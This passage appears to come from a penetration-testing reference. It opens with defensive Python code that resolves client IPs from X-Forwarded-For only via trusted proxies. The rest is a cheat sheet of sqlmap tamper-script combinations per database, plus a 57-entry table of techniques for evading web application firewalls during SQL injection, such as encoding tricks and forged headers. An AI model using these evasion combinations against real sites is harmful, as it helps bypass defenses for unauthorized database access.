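def resolve_client(peer: str, headers: Dict[str, str]) -> Tuple[str, List[str]]:
    """Return (client_ip, findings): the address an allowlist or rate limit may rely on,
    plus anomalies worth logging (override headers from outside, malformed hops)."""
    findings: List[str] = []
    hdrs = {k.lower(): v for k, v in headers.items()}
    present = [h for h in OVERRIDE_HEADERS if h in hdrs]

    # Not behind a trusted proxy: the TCP peer is the client and every override header is forged.
    if not _trusted(ipaddress.ip_address(peer)):
        if present:
            findings.append("override headers from untrusted peer ignored: " + ", ".join(present))
        return peer, findings

    # Behind a trusted proxy: the proxies append the real peer on the right, so anything the
    # client wrote into the header itself sits further left and is skipped.
    hops = [h.strip() for h in hdrs.get("x-forwarded-for", "").split(",") if h.strip()]
    for i in range(len(hops) - 1, -1, -1):
        try:
            addr = ipaddress.ip_address(hops[i])
        except ValueError:
            findings.append("malformed X-Forwarded-For hop %r" % hops[i])
            return peer, findings
        if _trusted(addr):
            continue
        if i:
            findings.append("client-supplied hop(s) ignored: " + ", ".join(hops[:i]))
        return hops[i], findings
    return peer, findings


if __name__ == "__main__":
    # constructed sample: a forged loopback hop in front of the address the proxy appended
    print(resolve_client("10.0.0.2", {"X-Forwarded-For": "127.0.0.1, 203.0.113.5"}))
```

Only X-Forwarded-For is ever consulted, and only from a trusted peer; the other override headers are logged when present and otherwise ignored, which removes the value of injecting them.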

Some commonly used tamper combinations

General-purpose test set

```text
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
```

Microsoft SQL Server

```text
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
```

MySQL

```text
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
```

Oracle

```text
tamper=between,charencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes,xforwardedfor
```

Microsoft Access

```text
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
```

PostgreSQL

```text
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,xforwardedfor
```
| No. | Script | Effect |
|---|---|---|
| 1 | apostrophemask | Replaces the single quote with a full-width UTF-8 character |
| 2 | apostrophenullencode | Replaces the single quote with %00%27 |
| 3 | appendnullbyte | Appends %00 after the payload |
| 4 | base64encode | Base64-encodes the payload |
| 5 | between | Replaces comparison operators with BETWEEN |
| 6 | bluecoat | Replaces spaces with random blank characters and = with LIKE |
| 7 | chardoubleencode | Double URL-encodes |
| 8 | charencode | URL-encodes |
| 9 | charunicodeencode | Unicode (%uXXXX) URL-encodes |
| 10 | charunicodeescape | Unicode-escapes (\uXXXX) the not-yet-encoded characters |
| 11 | commalesslimit | Rewrites LIMIT without a comma |
| 12 | commalessmid | Rewrites MID without commas |
| 13 | commentbeforeparentheses | Adds an inline comment before parentheses |
| 14 | concat2concatws | Replaces CONCAT with CONCAT_WS |
| 15 | equaltolike | Replaces = with LIKE |
| 16 | escapequotes | Backslash-escapes quotes |
| 17 | greatest | Replaces > with GREATEST |
| 18 | halfversionedmorekeywords | Adds a versioned comment before every keyword |
| 19 | hex2char | Converts each 0x-encoded string to an equivalent CONCAT(CHAR(),…) expression |
| 20 | htmlencode | HTML-encodes all non-alphanumeric characters |
| 21 | ifnull2casewhenisnull | Rewrites IFNULL as CASE WHEN ISNULL |
| 22 | ifnull2ifisnull | Rewrites IFNULL as IF(ISNULL(A), …) |
| 23 | informationschemacomment | Adds a comment after the information_schema identifier |
| 24 | least | Replaces > with LEAST |
| 25 | lowercase | Converts everything to lower case |
| 26 | luanginx | Bypasses the Lua nginx WAF, which cannot handle more than 100 parameters |
| 27 | modsecurityversioned | Wraps the query in a versioned comment |
| 28 | modsecurityzeroversioned | Wraps the query in a zero-versioned comment |
| 29 | multiplespaces | Adds multiple spaces around keywords |
| 30 | overlongutf8 | Converts characters to overlong UTF-8 |
| 31 | overlongutf8more | Converts all characters to overlong UTF-8 |
| 32 | percentage | Adds % before each character |
| 33 | plus2concat | Replaces + with the CONCAT function |
| 34 | plus2fnconcat | Replaces + with the ODBC function {fn CONCAT()} |
| 35 | randomcase | Randomises letter case |
| 36 | randomcomments | Splits keywords with /**/ |
| 37 | sp_password | Appends sp_password |
| 38 | space2comment | Replaces spaces with /**/ |
| 39 | space2dash | Replaces spaces with -- plus random characters |
| 40 | space2hash | Replaces spaces with # plus random characters |
| 41 | space2morecomment | Replaces spaces with /**_**/ |
| 42 | space2morehash | Replaces spaces with # plus random characters and newlines |
| 43 | space2mssqlblank | Replaces spaces with other blank characters |
| 44 | space2mssqlhash | Replaces spaces with %23%0A |
| 45 | space2mysqlblank | Replaces spaces with other blank characters |
| 46 | space2mysqldash | Replaces spaces with --%0A |
| 47 | space2plus | Replaces spaces with + |
| 48 | space2randomblank | Replaces spaces with a random character from an alternative blank set |
| 49 | substring2leftright | Replaces the PostgreSQL SUBSTRING function with LEFT/RIGHT |
| 50 | symboliclogical | Replaces AND and OR with && and \|\| |
| 51 | unionalltounion | Replaces UNION ALL SELECT with UNION SELECT |
| 52 | unmagicquotes | Wide-character bypass of GPC |
| 53 | uppercase | Converts everything to upper case |
| 54 | varnish | Adds an HTTP header |
| 55 | versionedkeywords | Wraps every non-function keyword in a versioned comment |
| 56 | versionedmorekeywords | Wraps every keyword in a versioned comment |
| 57 | xforwardedfor | Adds a forged HTTP header |
